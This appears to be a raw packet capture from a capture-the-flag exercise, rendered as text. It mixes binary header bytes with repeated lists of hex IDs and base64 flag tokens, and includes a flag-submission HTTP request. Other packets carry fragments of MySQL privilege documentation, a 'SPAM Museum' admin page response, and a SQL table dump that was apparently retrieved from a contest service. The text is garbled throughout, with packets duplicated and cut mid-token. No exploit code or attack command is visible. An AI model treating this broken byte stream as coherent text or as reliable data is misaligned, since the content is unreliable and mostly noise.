86E7B003159790BCAB2A632477366E65,ucsb,MTNzEwEDAHCygnpAyN1loruD7VGZgIsS7X1idg==
8119B9228F6FC2EDD6127F61271EEFB3,ucsb,MTNzEwEDAHFF0N8m2Vfy9wYaqxDbBjJr0tcliQ==
BECFA2912BA42DF67902CF20F38D27FE,ucsb,MTNzEwEDAHI6uT9GSbOXnNuMrkWRoJgwkjkPZg==
32F527F5777EF57C41A1E73F78C3BC25,ucsb,MTNzEwEDAHNZDvOlkCPoyzWcttLqmGiap+A1cQ==
DA678A7EFCB2B43B65B2C21D80427B6D,ucsb,MTNzEwEDAHQk8iKdErwtmoJ7hXIyZY6ZOyAgnQ==
06D3A580B0DC5A6E08F421FC83210EDA,ucsb,MTNzEwEDAHU6Ci1enki6RzsR2z3mPDq5bC4+Nw==
C0C522B8889711B66DD525AC ` bb0`BiET@/o0AE< @@  Pԙ:  '<dZXRRoHdPCEviA==
A69AD5FD0614BE5F78C400ABA77B85A9,ucsb,MTNzEwEDAGdbAoM7Gzl7cCqL8G0XAxv9dD3PLg==
08590CDE201C0505AB25D5F9FBF0981D,ucsb,MTNzEwEDAGg/jdCJYL8a2jXBjPjppzvFeXHc3g==
F2464B4A70B4576B9D845095C616C4ED,ucsb,MTNzEwEDAGlzhUQYvA7Ajrz5kYkOZXOjUq4skA==
3E5C3591E833B4E2B2D0F6D602D2B279,ucsb,MTNzEwEDAGoC2HjxIS1mt/Z1D5T3TO9UYxVdVQ==
57F7CA381A425580049D6DE42346727F,ucsb,MTNzEwEDAGsTNvFcbllFbjdVlB6Yka9A/lECgg==
7C5D941E4D505F891D3F81967B85D1B3,ucsb,MTNzEwEDAGwo7RRti/WKp2olee1rUhZ0xB52BQ==
A419D832F28B2CDCD2A6D9E722F503E2,ucsb,MTNzEwEDAG2LSCv498Z9LYFpBSB5ZrE3Q97XLQ==
9562BEF120AE2B9A3E6638E9DD764FEA,ucsb,MTNzEwEDAG5cUtQb5l6Bxi5Qc0az2W3rTufbtA==
A31F32D567E79A25BC5CAD2B5E327E62,ucsb,MTNzEwEDAG/loEkmsfIphpeZRYaL6bZBjyduJw==
86E7B003159790BCAB2A632477366E65,ucsb,MTNzEwEDAHCygnpAyN1loruD7VGZgIsS7X1idg==
8119B9228F6FC2EDD6127F61271EEFB3,ucsb,MTNzEwEDAHFF0N8m2Vfy9wYaqxDbBjJr0tcliQ==
BECFA2912BA42DF67902CF20F38D27FE,ucsb,MTNzEwEDAHI6uT9GSbOXnNuMrkWRoJgwkjkPZg==
32F527F5777EF57C41A1E73F78C3BC25,ucsb,MTNzEwEDAHNZDvOlkCPoyzWcttLqmGiap+A1cQ==
DA678A7EFCB2B43B65B2C21D80427B6D,ucsb,MTNzEwEDAHQk8iKdErwtmoJ7hXIyZY6ZOyAgnQ==
06D3A580B0DC5A6E08F421FC83210EDA,ucsb,MTNzEwEDAHU6Ci1enki6RzsR2z3mPDq5bC4+Nw==
C0C522B8889711B66DD525AC` Bi0`E@/#<o0EȤ@?D  nPy9;= W~7=wGET /cgi-bin/submitflag.py?flag=MTNzExQCADp8m6dtoLIN2bZ5FpLjWPFhNWeTTQ== HTTP/1.1 User-Agent: Jakarta Commons-HttpClient/2.0.2 Host: 10.0.0.10 C(` ʪBiE@/o0o0oEȤ@@D  nPy9;= W~7=wGET /cgi-bin/submitflag.py?flag=MTNzExQCADp8m6dtoLIN2bZ5FpLjWPFhNWeTTQ== HTTP/1.1 User-Agent: Jakarta Commons-HttpClient/2.0.2 Host: 10.0.0.10 C` bbBi0`ET@/ԂSŀo0E<!@?  Pԙ:  '<d97D0E6FAA,ucsb,MTNzEwEDAHbKt7gegLJVmz89zox7RTdhjIRPBw==
C9ABEC790C56A2E41879BF8527D95053,ucsb,MTNzEwEDAHdUp/SOjCVG4xil53qk5c4c6FjLyA==
5108640F69B0279E56670F33D425FCBE,ucsb,MTNzEwEDAHibZWNuh8WLU6gJfkXA4B1QVrnMWg==
3D34F846CA1F3DB83BCE55610A506F5F,ucsb fa0 ,MTNzEwEDAHmierDTYB+AVJXL2OgJmguLVwWmaA==
3771C30D164716CC349F9055DA1C6E10,ucsb,MTNzEwEDAHohRSgBzuPsdGCcdCVhJ07ihdie5g==
B429AE4DFD136C4A45DB5DEA4AC95591,ucsb,MTNzEwEDAHv1nK0ykMJtPVUora+CNtv8+NGvAQ==
18E7A0F867FE1FB0152845DD92FB51BD,ucsb,MTNzEwEDAHxa1m3D8EWZamLiv+yXn9YzP2iAlw==
35EBFB4B9C1A9AC484A64FD5F605EAAA,ucsb,MTNzEwEDAH1dJXLMHdhKBYSxzakqmBH3ehHHcw==
EAC86BDCBADA3035D31DE8FE7F47380B,ucsb,MTNzEwEDAH6aG1v5xq0OU7nTJSBMUnKxAQ/2Bw==
041EBD544D2E0A1125F5F73CF3A63FEA,ucsb,MTNzEwEDAH8+z3oPpnYdHeh88nh8+QFdjmiokA==
178A82C334DE1E12911EBC35BB0E088C,ucsb,MTNzEwEDAIDIoeDhX6FfoUNE4X/akEbh9gR9vg==
24C17703F529D916C3064E1E5A9AFDA6,ucsb,MTNzEwEDAIGuyadaqOSB0vexKk1UJq7BqervCA==
14B54834867F16E6535DF986F85924F8,ucsb,MTNzEwEDAIKS5y+F+BUGr2PI3CIL0IDpwhVIgw==
1B8223970C90B59F5C4531675388372C,ucsb,MTNzEwEDAIMlbYT6s88p6p4IRby8W1FZaY9SYg==
B547C2731B6B3FB406064CBB7A65F368,ucsb,MTNzEwEDAISUQdBygWrkcVMYlDxwoP/RuaXxFw==
3AD4922D7EEC3440C76F3A872CEF9DF1,ucsb,MTNzEwEDAIUEqkWR+wFuWC` bb0`BiET@/o0AE<!@@  Pԙ:  '<d97D0E6FAA,ucsb,MTNzEwEDAHbKt7gegLJVmz89zox7RTdhjIRPBw==
C9ABEC790C56A2E41879BF8527D95053,ucsb,MTNzEwEDAHdUp/SOjCVG4xil53qk5c4c6FjLyA==
5108640F69B0279E56670F33D425FCBE,ucsb,MTNzEwEDAHibZWNuh8WLU6gJfkXA4B1QVrnMWg==
3D34F846CA1F3DB83BCE55610A506F5F,ucsb fa0 ,MTNzEwEDAHmierDTYB+AVJXL2OgJmguLVwWmaA==
3771C30D164716CC349F9055DA1C6E10,ucsb,MTNzEwEDAHohRSgBzuPsdGCcdCVhJ07ihdie5g==
B429AE4DFD136C4A45DB5DEA4AC95591,ucsb,MTNzEwEDAHv1nK0ykMJtPVUora+CNtv8+NGvAQ==
18E7A0F867FE1FB0152845DD92FB51BD,ucsb,MTNzEwEDAHxa1m3D8EWZamLiv+yXn9YzP2iAlw==
35EBFB4B9C1A9AC484A64FD5F605EAAA,ucsb,MTNzEwEDAH1dJXLMHdhKBYSxzakqmBH3ehHHcw==
EAC86BDCBADA3035D31DE8FE7F47380B,ucsb,MTNzEwEDAH6aG1v5xq0OU7nTJSBMUnKxAQ/2Bw==
041EBD544D2E0A1125F5F73CF3A63FEA,ucsb,MTNzEwEDAH8+z3oPpnYdHeh88nh8+QFdjmiokA==
178A82C334DE1E12911EBC35BB0E088C,ucsb,MTNzEwEDAIDIoeDhX6FfoUNE4X/akEbh9gR9vg==
24C17703F529D916C3064E1E5A9AFDA6,ucsb,MTNzEwEDAIGuyadaqOSB0vexKk1UJq7BqervCA==
14B54834867F16E6535DF986F85924F8,ucsb,MTNzEwEDAIKS5y+F+BUGr2PI3CIL0IDpwhVIgw==
1B8223970C90B59F5C4531675388372C,ucsb,MTNzEwEDAIMlbYT6s88p6p4IRby8W1FZaY9SYg==
B547C2731B6B3FB406064CBB7A65F368,ucsb,MTNzEwEDAISUQdBygWrkcVMYlDxwoP/RuaXxFw==
3AD4922D7EEC3440C76F3A872CEF9DF1,ucsb,MTNzEwEDAIUEqkWR+wFuWC7a bbBi0`ET@/p܂Ao0E<@?x  3Pɟtj  )>USER user;\n\nThe statement removes privilege records for the account from all grant tables.\n\nFrom MySQL 4.1.1 to 5.0.1, DROP USER deletes only MySQL accounts that\ndon\'t have any privileges. In these MySQL versions, it serves only to remove\neach account record from the user table. To remove a MySQL account, you\nshould use the following procedure, performing the steps in the order shown:\n\n@enumerate\n --- Use SHOW GRANTS to determine what privileges the account has.\nSee also : [SHOW GRANTS, , SHOW GRANTS].\n --- Use REVOKE to revoke the privileges displayed by SHOW GRANTS.\nThis removes records for the account from all the grant tables except the\nuser table, and revokes any global privileges listed in the user\ntable.\nSee also : [GRANT, , GRANT].\n --- Delete the account by using DROP USER to remove the user table\nrecord.\n@end enumerate\n\nDROP USER does not automatically close any open user sessions. Rather, in\nthe event that a user with an open session is dropped, the command does not take\neffect until that user\'s session is closed. Once the session is closed, the user\nis dropped, and that user\'s next attempt to log in will fail. This is by design.\n\nBefore MySQL 4.1.1, DROP USER is not available. You should first\nrevoke the account privileges CAa ZZBi0`EL@/܂Sŀo0E4SV@?) 3 PtW't )PCXa bb0`BiET@/Ԁo0SE<@@w  3Pɟtj  )>USER user;\n\nThe statement removes privilege records for the account from all grant tables.\n\nFrom MySQL 4.1.1 to 5.0.1, DROP USER deletes only MySQL accounts that\ndon\'t have any privileges. In these MySQL versions, it serves only to remove\neach account record from the user table. To remove a MySQL account, you\nshould use the following procedure, performing the steps in the order shown:\n\n@enumerate\n --- Use SHOW GRANTS to determine what privileges the account has.\nSee also : [SHOW GRANTS, , SHOW GRANTS].\n --- Use REVOKE to revoke the privileges displayed by SHOW GRANTS.\nThis removes records for the account from all the grant tables except the\nuser table, and revokes any global privileges listed in the user\ntable.\nSee also : [GRANT, , GRANT].\n --- Delete the account by using DROP USER to remove the user table\nrecord.\n@end enumerate\n\nDROP USER does not automatically close any open user sessions. Rather, in\nthe event that a user with an open session is dropped, the command does not take\neffect until that user\'s session is closed. Once the session is closed, the user\nis dropped, and that user\'s next attempt to log in will fail. This is by design.\n\nBefore MySQL 4.1.1, DROP USER is not available. You should first\nrevoke the account privileges Cja ZZ0`BiEL@/go0AE4SV@@) 3 PtW't )PC0b bbBi0`ET@/p܂Ao0E<@?x  3Pџtj : )>as just described. Then delete the user\ntable record and flush the grant tables like this:\n\nmysql> DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n | MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke them from\naccounts. GC:b ZZBi0`EL@/܂Sŀo0E4l@? 3 P'te" )PCQb bb0`BiET@/Ԁo0SE<@@w  3Pџtj : )>as just described. Then delete the user\ntable record and flush the grant tables like this:\n\nmysql> DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n | MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke them from\naccounts. GCcb ZZ0`BiEL@/go0AE4l@@ 3 P'te" )PCgb LLBi0`E>@/a SPAM Museum Administrator Interface
C~b LL0`BiE>@/,o0AE&@@  PoK! ŀ  qc[HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:54:35 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Transfer-Encoding: chunked Content-Type: text/html fd SPAM Museum Administrator Interface
Cb ZZBiʪEL@/o0oo0E4A@@ Pn9;  7=xW~ԌCb ZZ0`BiEL@/To0<E4A@@ Pn9;  7=xW~ԌCc bbBi0`ET@/p܂Ao0E<@?x  3Pٟtj  )>RANT and REVOKE are implemented in MySQL 3.22.11\nor later. For earlier MySQL versions, these statements do nothing.\n\nMySQL account information is stored in the tables of the mysql\ndatabase. This database and the access control system are discussed\nextensively in [MySQL Database Administration], which you should consult\nfor additional details.\n\nIf the grant tables contain privilege records that contain mixed-case\ndatabase or table names and the lower_case_table_names system\nvariable is set, REVOKE cannot be used to revoke the privileges. It\nwill be necessary to manipulate the grant tables directly. (GRANT\nwill not create such records when lower_case_table_names is set,\nbut such records might have been created prior to setting the variable.)\n\nPrivileges can be granted at several levels:\n\n Global level\nGlobal privileges apply to all databases on a given server. These privileges\nare stored in the mysql.user table.\nGRANT ALL ON *.* and\nREVOKE ALL ON *.* grant and revoke only global privileges.\n\n Database level\nDatabase privileges apply to all objects in a given database. These privileges\nare stored in the mysql.db and mysql.host tables.\nGRANT ALL ON db_name.* and\nREVOKE ALL ON db_name.* grant and revoke only database privileges.\n\n Table lCc bb0`BiET@/Ԁo0SE<@@w  3Pٟtj  )>RANT and REVOKE are implemented in MySQL 3.22.11\nor later. For earlier MySQL versions, these statements do nothing.\n\nMySQL account information is stored in the tables of the mysql\ndatabase. This database and the access control system are discussed\nextensively in [MySQL Database Administration], which you should consult\nfor additional details.\n\nIf the grant tables contain privilege records that contain mixed-case\ndatabase or table names and the lower_case_table_names system\nvariable is set, REVOKE cannot be used to revoke the privileges. It\nwill be necessary to manipulate the grant tables directly. (GRANT\nwill not create such records when lower_case_table_names is set,\nbut such records might have been created prior to setting the variable.)\n\nPrivileges can be granted at several levels:\n\n Global level\nGlobal privileges apply to all databases on a given server. These privileges\nare stored in the mysql.user table.\nGRANT ALL ON *.* and\nREVOKE ALL ON *.* grant and revoke only global privileges.\n\n Database level\nDatabase privileges apply to all objects in a given database. These privileges\nare stored in the mysql.db and mysql.host tables.\nGRANT ALL ON db_name.* and\nREVOKE ALL ON db_name.* grant and revoke only database privileges.\n\n Table lC%d bbBi0`ET@/ԂSŀo0E<"@?  Pԙ:  '<dCGfm0oj9Y4bJiT/sg==
F927894C5A5B3FB2B2050C0B35C9FE8A,ucsb,MTNzEwEDAIZOZu1/KPGOritSei9rdRfhkDM8SQ==
A56E81B00DD151AB63FA47A6C8A1755F,ucsb,MTNzEwEDAIdip+frq0pDG/+p0/9O0rd1w9FnoQ==
5D167D1FD4A0DA0AF9EC3E884BD8D515,ucsb,MTNzEwEDAIjYUXhhp8Gbs1/cICMCGLYH0XUvnA==
69E734EE09540253B2AA677BEFE068F1,ucsb,MTNzEwEDAIniF7sh+pjzhRFx1GR+Jt8AsCNB3w==
E8F1E8E31DB004C24B0E2A30C95BC753,ucsb,MTNzEwEDAIrXaleg0W9TW0zrarbPnCTGMJnOxg==
664DB58C7D0CDAA581C3E550A247CAA9,ucsb,MTNzEwEDAIvqqOAKima2m9PxcPXYakOUyccusQ==
6E2FE7E43391215601402F9B8B6C30F8,ucsb,MTNzEwEDAIzcjw9oeoqiee6tq51uryYZ1+WkcA==
AF0A7679B4B30E723CC46A48D61E9424,ucsb,MTNzEwEDAI1278mNWF8v4H/xNuFKXEHpUUGL4g==
18654B6B8BD92B58FFB4CBB78032946D,ucsb,MTNzEwEDAI56flkMSk5LM+lRx54GTEgFMBxh/Q==
8B95C46AB71E79CDB30869D7A18A7AEB,ucsb,MTNzEwEDAI/X2zsuOJQU33oq3dboMhRyvJYXfg==
6581FB76E8E3879349FC28C3BE62993B,ucsb,MTNzEwEDAJDSVnEgOYAXgF8KW+km8QNkT6sGvw==
BA3FBBBAFE9E92A693587A0CA1A670E7,ucsb,MTNzEwEDAJF6BNE1eAjn4HFad5gC3sI8/XF4VA==
09E82AE548CC1178CB775E360EEA94FB,ucsb,MTNzEwEDAJJtHKDpwf1tbm4bZRALqjWAMnGd8Q==
F16BEF59CC23765B04B12285F9BAB509,ucsb,MTNzEwEDAJMdpIXjdZ5MO3ozQEQOAvL8D6Jqog==
58466BABAD25D5BC99E5847A504D4A96,ucsb,MTNzEwEDAJQNJzBxoxMBNRbGtpSd/njHw6XUYQ==
E219C4AC69221C99DACC@d bb0`BiET@/o0AE<"@@  Pԙ:  '<dCGfm0oj9Y4bJiT/sg==
F927894C5A5B3FB2B2050C0B35C9FE8A,ucsb,MTNzEwEDAIZOZu1/KPGOritSei9rdRfhkDM8SQ==
A56E81B00DD151AB63FA47A6C8A1755F,ucsb,MTNzEwEDAIdip+frq0pDG/+p0/9O0rd1w9FnoQ==
5D167D1FD4A0DA0AF9EC3E884BD8D515,ucsb,MTNzEwEDAIjYUXhhp8Gbs1/cICMCGLYH0XUvnA==
69E734EE09540253B2AA677BEFE068F1,ucsb,MTNzEwEDAIniF7sh+pjzhRFx1GR+Jt8AsCNB3w==
E8F1E8E31DB004C24B0E2A30C95BC753,ucsb,MTNzEwEDAIrXaleg0W9TW0zrarbPnCTGMJnOxg==
664DB58C7D0CDAA581C3E550A247CAA9,ucsb,MTNzEwEDAIvqqOAKima2m9PxcPXYakOUyccusQ==
6E2FE7E43391215601402F9B8B6C30F8,ucsb,MTNzEwEDAIzcjw9oeoqiee6tq51uryYZ1+WkcA==
AF0A7679B4B30E723CC46A48D61E9424,ucsb,MTNzEwEDAI1278mNWF8v4H/xNuFKXEHpUUGL4g==
18654B6B8BD92B58FFB4CBB78032946D,ucsb,MTNzEwEDAI56flkMSk5LM+lRx54GTEgFMBxh/Q==
8B95C46AB71E79CDB30869D7A18A7AEB,ucsb,MTNzEwEDAI/X2zsuOJQU33oq3dboMhRyvJYXfg==
6581FB76E8E3879349FC28C3BE62993B,ucsb,MTNzEwEDAJDSVnEgOYAXgF8KW+km8QNkT6sGvw==
BA3FBBBAFE9E92A693587A0CA1A670E7,ucsb,MTNzEwEDAJF6BNE1eAjn4HFad5gC3sI8/XF4VA==
09E82AE548CC1178CB775E360EEA94FB,ucsb,MTNzEwEDAJJtHKDpwf1tbm4bZRALqjWAMnGd8Q==
F16BEF59CC23765B04B12285F9BAB509,ucsb,MTNzEwEDAJMdpIXjdZ5MO3ozQEQOAvL8D6Jqog==
58466BABAD25D5BC99E5847A504D4A96,ucsb,MTNzEwEDAJQNJzBxoxMBNRbGtpSd/njHw6XUYQ==
E219C4AC69221C99DACCd bbBi0`ET@/ԂSŀo0E<#@?  Pԙ: x[ '<d1F502A72EE264,ucsb,MTNzEwEDAJWH3Fr4Ke8VZZSWJ9FZeTLI15JtnQ==
4F21053CFBB4A3D303FA6BCA84439113,ucsb,MTNzEwEDAJbJiTy35xh3gfoJLynFw321nG/4jg==
04482EB05F150919F31A2F6F345F43BE,ucsb,MTNzEwEDAJdueBFN07xhrqbJc1ipu3/MRQtcBw==
01507369F1B42BF39F35D34E787E687C,ucsb,MTNzEwEDAJhT1gmb1WmfZsioEMj87C0PZuIr+A==
991AAC688A94317144805FA102C52D96,ucsb,MTNzEwEDAJmK1c0XGFnoAxEXyhHepUtWCYRg8Q==
37A09278ED3CF84DA3D898AE8E9547D6,ucsb,MTNzEwEDAJp+fMadkboon6EAiZjUxu0PIcKnUA==
94D20BAC0EF6DDBCDF90587D05DB948A,ucsb,MTNzEwEDAJv2sp9HxRyylN7UgEieU5t05aJX1w==
5094985738F0DAF754FCE19B9ED42FAC,ucsb,MTNzEwEDAJykg8DZbxXCdux0g7Mccp0eq81caA==
09BA82B97A205B04A000E9ACAC877AB9,ucsb,MTNzEwEDAJ1bkhV7vn3V0LXrvMcj9Ml7LK+wXA==
97E770552E3C3B237CA671A8EAC1D7A4,ucsb,MTNzEwEDAJ77E2CBwZYpz2oxZkqrs5XurclBkA==
8F70CFD938CAB9BEE033DD2CFA7C8CE0,ucsb,MTNzEwEDAJ8Srx8Xypa0hCJo/vdfZbBCqXEZZg==
73700E65BBD08E239EF66C460CFF478D,ucsb,MTNzEwEDAKA1GsFynNl8YBiQggD9sRcmEdtiWQ==
DF747B4D4F6A425394B33249B953C029,ucsb,MTNzEwEDAKHgwbeS3sU47OqjA2gwQNfzb9Gz/A==
1140D5C382A4C4C0ADCDA28E536B6B5A,ucsb,MTNzEwEDAKLmUTTlaSvCxMUJCZIPOVMX1C0I8w==
173EE8D719010D0239ECB825854D2C43,ucsb,MTNzEwEDAKNg1xDMtAR4CzLiB3iLf7Q9mDKsMA==
D0806815A84DEAD1ECDB702E05359CB1,ucsb,MTNzEwEDAKT3ADStKQndZg9iCd bb0`BiET@/o0AE<#@@  Pԙ: x[ '<d1F502A72EE264,ucsb,MTNzEwEDAJWH3Fr4Ke8VZZSWJ9FZeTLI15JtnQ==
4F21053CFBB4A3D303FA6BCA84439113,ucsb,MTNzEwEDAJbJiTy35xh3gfoJLynFw321nG/4jg==
04482EB05F150919F31A2F6F345F43BE,ucsb,MTNzEwEDAJdueBFN07xhrqbJc1ipu3/MRQtcBw==
01507369F1B42BF39F35D34E787E687C,ucsb,MTNzEwEDAJhT1gmb1WmfZsioEMj87C0PZuIr+A==
991AAC688A94317144805FA102C52D96,ucsb,MTNzEwEDAJmK1c0XGFnoAxEXyhHepUtWCYRg8Q==
37A09278ED3CF84DA3D898AE8E9547D6,ucsb,MTNzEwEDAJp+fMadkboon6EAiZjUxu0PIcKnUA==
94D20BAC0EF6DDBCDF90587D05DB948A,ucsb,MTNzEwEDAJv2sp9HxRyylN7UgEieU5t05aJX1w==
5094985738F0DAF754FCE19B9ED42FAC,ucsb,MTNzEwEDAJykg8DZbxXCdux0g7Mccp0eq81caA==
09BA82B97A205B04A000E9ACAC877AB9,ucsb,MTNzEwEDAJ1bkhV7vn3V0LXrvMcj9Ml7LK+wXA==
97E770552E3C3B237CA671A8EAC1D7A4,ucsb,MTNzEwEDAJ77E2CBwZYpz2oxZkqrs5XurclBkA==
8F70CFD938CAB9BEE033DD2CFA7C8CE0,ucsb,MTNzEwEDAJ8Srx8Xypa0hCJo/vdfZbBCqXEZZg==
73700E65BBD08E239EF66C460CFF478D,ucsb,MTNzEwEDAKA1GsFynNl8YBiQggD9sRcmEdtiWQ==
DF747B4D4F6A425394B33249B953C029,ucsb,MTNzEwEDAKHgwbeS3sU47OqjA2gwQNfzb9Gz/A==
1140D5C382A4C4C0ADCDA28E536B6B5A,ucsb,MTNzEwEDAKLmUTTlaSvCxMUJCZIPOVMX1C0I8w==
173EE8D719010D0239ECB825854D2C43,ucsb,MTNzEwEDAKNg1xDMtAR4CzLiB3iLf7Q9mDKsMA==
D0806815A84DEAD1ECDB702E05359CB1,ucsb,MTNzEwEDAKT3ADStKQndZg9iCe bbBi0`ET@/أ  o0E<@?j  3PZi: K _)4IU',4857,'MTNzExEJADuG5A6ujRzFfhAbea24BADDkSRU+Q==','32129136'),(870811604,'t2s1br56',3247,'MTNzExEJADxXQsL0sB2coW0LFHl3fpbsOEM16Q==','30483635'); UNLOCK TABLES; /*!40000 ALTER TABLE `contributors` ENABLE KEYS */; -- -- Current Database: `Public` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Public` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `Public`; -- -- Table structure for table `entries` -- DROP TABLE IF EXISTS `entries`; CREATE TABLE `entries` ( `id` int(8) NOT NULL auto_increment, `author` varchar(24) default NULL, `text` text, `score` int(11) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `entries` -- /*!40000 ALTER TABLE `entries` DISABLE KEYS */; LOCK TABLES `entries` WRITE; INSERT INTO `entries` VALUES (1,'Sir Spamm','For sale: Remove List: list of addresses you should not mail to. These are addresses that were returned undeliverable and of people who wanted to be removed from e-mailing list through out the internet. These list also include flamers, those people who find it amusing to complaing to ISP and get your account deleted - Price: $75 for 200,000',312),(2,'Frank Young','If you are a time traveler or alien disguised as human and or have the technology to travel physically thCe bb0`BiET@/Ԁo0SE<@@i  3PZi: K _)4IU',4857,'MTNzExEJADuG5A6ujRzFfhAbea24BADDkSRU+Q==','32129136'),(870811604,'t2s1br56',3247,'MTNzExEJADxXQsL0sB2coW0LFHl3fpbsOEM16Q==','30483635'); UNLOCK TABLES; /*!40000 ALTER TABLE `contributors` ENABLE KEYS */; -- -- Current Database: `Public` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Public` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `Public`; -- -- Table structure for table `entries` -- DROP TABLE IF EXISTS `entries`; CREATE TABLE `entries` ( `id` int(8) NOT NULL auto_increment, `author` varchar(24) default NULL, `text` text, `score` int(11) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `entries` -- /*!40000 ALTER TABLE `entries` DISABLE KEYS */; LOCK TABLES `entries` WRITE; INSERT INTO `entries` VALUES (1,'Sir Spamm','For sale: Remove List: list of addresses you should not mail to. These are addresses that were returned undeliverable and of people who wanted to be removed from e-mailing list through out the internet. These list also include flamers, those people who find it amusing to complaing to ISP and get your account deleted - Price: $75 for 200,000',312),(2,'Frank Young','If you are a time traveler or alien disguised as human and or have the technology to travel physically thCf bbBi0`ET@/ԂSŀo0E<$@?  Pԙ: % '<dFyzVhmBnNsnTOg==
31F5242596810EA9C3A9A9E91B537E0F,ucsb,MTNzEwEDAKXCaBs5DeEdGDMzmCey0YVY/OaA5A==
8964F39A5ED0922272712CC59582EF34,ucsb,MTNzEwEDAKYjc6POgYHKqGBGeDYbnoikAojErQ==
F729111A20C15DA025F46FFBAC79FCCF,ucsb,MTNzEwEDAKdZNE1eo0Tq+qsSjzVPCmJKiYFRuQ==
23DFCBDB611C7CF068CC13DD08F79418,ucsb,MTNzEwEDAKgmaUrUtQuO2jDmQrcxDfE2ci1GBA==
3E16405BEB392A2FD84800423902F992,ucsb,MTNzEwEDAKkZFc5 fa0 AHL9z2Be5V8gR6FDuw74p+g==
5A116FE50ACF6A3ACEB55E714BA51726,ucsb,MTNzEwEDAKowirGU9C7JatCx5S+n3L7fCEfTVQ==
A9C55B567EEC10D6C89A25C10D518092,ucsb,MTNzEwEDAKulkMzX6fjjHlv9Hj0vzVdx1VTvzQ==
230412B4E25BF5C0929E486B754BC927,ucsb,MTNzEwEDAKxXOSCkVH29GNtLw04ioyKDq3a5gQ==
7E6B3D2E38EAC54E6CFE521BDFF0A050,ucsb,MTNzEwEDAK3t+zsy8SGyoSwEyiCHGzOHm6K94w==
43686AE1A8F85960CC03F5B5FA0B91C6,ucsb,MTNzEwEDAK5pqRrzW0TofuuBvheWLCCLXpZ9Fg==
64480978C27DE3C095A41BFCC8334519,ucsb,MTNzEwEDAK+jI6toDg+OLjbNZyMzQ1N0NKDcvQ==
42DAE2EDF9E02450E7F9097CED4FDC96,ucsb,MTNzEwEDALDSPfiJb2/eUl8phy2ZDs5vN14/YA==
7BFBFC8D718CB2F33E19B1F396BF0392,ucsb,MTNzEwEDALH+jksMBA5MJc9EOsYVFC84RQj7Ew==
E1470E3A2AE45D78ED5FD61CC4BE9A20,ucsb,MTNzEwEDALKsb5ruqWgfv+bUz9sZeSwDd2kUWg==
27C6B513327B328F78CF0A2E1CEC30ED,ucsb,MTNzEwEDALNgSA7rUv+ctoNYWBuZq2tZwKvO5w==
6607D5EF70015ACCf ZZBi0`EL@/܂Sŀo0E4\K@?4 3 Pu}Ud$; )PCf bb0`BiET@/o0AE<$@@  Pԙ: % '<dFyzVhmBnNsnTOg==
31F5242596810EA9C3A9A9E91B537E0F,ucsb,MTNzEwEDAKXCaBs5DeEdGDMzmCey0YVY/OaA5A==
8964F39A5ED0922272712CC59582EF34,ucsb,MTNzEwEDAKYjc6POgYHKqGBGeDYbnoikAojErQ==
F729111A20C15DA025F46FFBAC79FCCF,ucsb,MTNzEwEDAKdZNE1eo0Tq+qsSjzVPCmJKiYFRuQ==
23DFCBDB611C7CF068CC13DD08F79418,ucsb,MTNzEwEDAKgmaUrUtQuO2jDmQrcxDfE2ci1GBA==
3E16405BEB392A2FD84800423902F992,ucsb,MTNzEwEDAKkZFc5 fa0 AHL9z2Be5V8gR6FDuw74p+g==
5A116FE50ACF6A3ACEB55E714BA51726,ucsb,MTNzEwEDAKowirGU9C7JatCx5S+n3L7fCEfTVQ==
A9C55B567EEC10D6C89A25C10D518092,ucsb,MTNzEwEDAKulkMzX6fjjHlv9Hj0vzVdx1VTvzQ==
